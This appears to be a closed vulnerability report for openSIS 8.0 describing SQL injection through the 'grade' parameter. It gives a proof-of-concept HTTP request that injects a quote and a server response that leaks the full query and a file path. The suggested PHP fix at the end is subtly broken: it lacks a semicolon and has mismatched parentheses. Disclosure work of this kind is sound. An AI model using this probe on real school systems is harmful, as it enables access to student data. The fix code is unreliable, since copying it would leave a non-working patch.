Closed
Description
A SQL injection vulnerability exists in version 8.0 of openSIS when MySQL or MariaDB is used as the application database. An attacker can then issue the SQL command through the /opensis/functions/GetStuListFnc.php Grade= parameter

POC

REQUEST
POST /Modules.php?modname=students/AdvancedReport.php&modfunc=&search_modfunc=list&next_modname=students/AdvancedReport.php HTTP/1.1
Host: 192.168.21.130
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 850
Origin: http://192.168.21.130
Connection: close
Referer: http://192.168.21.130/Modules.php?modname=miscellaneous/Portal.php&failed_login=
Cookie: PHPSESSID=1kkijlk6rkvfn3rs91kjn5hj1i; miniSidebar=0
Upgrade-Insecure-Requests: 1
last=ad&first=a%CC%81cd&stuid=adc&altid=123&addr=dsca&grade='§ion=&w_course_period_id=27&marking_period_id=&activity_id=&absences_term=FY&absences_low=&absences_high=&list_gpa=Y&gpa_term=19&gpa_low=&gpa_high=&cgpa=Y&cgpa_low=&cgpa_high=&month_include_active_date=09&day_include_active_date=01&year_include_active_date=2021&class_rank_term=CUM&class_rank_low=&class_rank_high=&letter_grade_exclude=Y&letter_grade_term=19&letter_grade%5B8%5D=Y&sql_save_session=true&mp_comment=&month_from_birthdate=&day_from_birthdate=&month_to_birthdate=&day_to_birthdate=&goal_title=&goal_description=&progress_name=&progress_description=&med_month=&med_day=&med_year=&doctors_note_comments=&type=&imm_month=&imm_day=&imm_year=&imm_comments=&ma_month=&ma_day=&ma_year=&med_alrt_title=&nv_month=&nv_day=&nv_year=&reason=&result=&med_vist_comments=&address_group=Y
RESPONSE
HTTP/1.1 200 OK
Date: Wed, 22 Sep 2021 05:39:16 GMT
Server: Apache/2.4.46 (Debian)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 60208
Connection: close
Content-Type: text/html; charset=UTF-8
[...]
<b>SQL:</b></TD>
<TD>SELECT COUNT(s.STUDENT_ID) AS STUDENT_COUNT FROM students s ,student_enrollment ssm LEFT OUTER JOIN student_address sam ON (ssm.STUDENT_ID=sam.STUDENT_ID AND sam.TYPE='Home Address' ) ,schedule w_ss WHERE ssm.STUDENT_ID=s.STUDENT_ID AND ssm.SYEAR='2023' AND (ssm.START_DATE IS NOT NULL AND ('2021-09-22'<=ssm.END_DATE OR ssm.END_DATE IS NULL) OR ssm.DROP_CODE=33 ) AND ssm.SYEAR='2023' AND ssm.SCHOOL_ID='1' AND w_ss.STUDENT_ID=s.STUDENT_ID AND w_ss.SYEAR=ssm.SYEAR AND w_ss.SCHOOL_ID=ssm.SCHOOL_ID AND w_ss.COURSE_PERIOD_ID='27' AND ('2021-09-22' BETWEEN w_ss.START_DATE AND w_ss.END_DATE OR w_ss.END_DATE IS NULL) AND NOT EXISTS (SELECT '' FROM student_report_card_grades sg3 WHERE sg3.STUDENT_ID=ssm.STUDENT_ID AND sg3.SYEAR=ssm.SYEAR AND sg3.REPORT_CARD_GRADE_ID IN ('8')AND sg3.MARKING_PERIOD_ID='19' ) AND s.IS_DISABLE IS NULL AND ssm.STUDENT_ID = 'adc' AND LOWER(s.ALT_ID) LIKE '123%' AND LOWER(s.LAST_NAME) LIKE 'ad%' AND LOWER(s.FIRST_NAME) LIKE 'ácd%' AND ssm.GRADE_ID IN(SELECT id FROM school_gradelevels WHERE title=NULL'') AND (LOWER(sam.STREET_ADDRESS_1) LIKE '%dsca%' OR LOWER(sam.CITY) LIKE 'dsca%' OR LOWER(sam.STATE)='dsca' OR ZIPCODE LIKE 'dsca%')</TD>
</TR>
</TR><TR>
<TD align=right><b>Traceback:</b></TD>
<TD>/var/www/opensis/functions/GetStuListFnc.php at 680</TD>
</TR>
</TR><TR>
<TD align=right><b>Additional Information:</b></TD>
<TD>You have an error in your SQL syntax; check the manual that corresponds to your MariaDB server version for the right syntax to use near ''') AND (LOWER(sam.STREET_ADDRESS_1) LIKE '%dsca%' OR LOWER(sam.CITY) LIKE 'd...' at line 1</TD>
</TR>
[...]
SOLUTION
Use function sqlSecurityFilter() before assign $_REQUEST['grade'] to query.
the code should look like:
if ($_REQUEST['grade']) {
$grade=sqlSecurityFilter($_REQUEST['grade'])
$allSQL .= ' AND ssm.GRADE_ID IN(SELECT id FROM school_gradelevels WHERE title= \'' . singleQuoteReplace("'", "\'", $grade . '\')';
}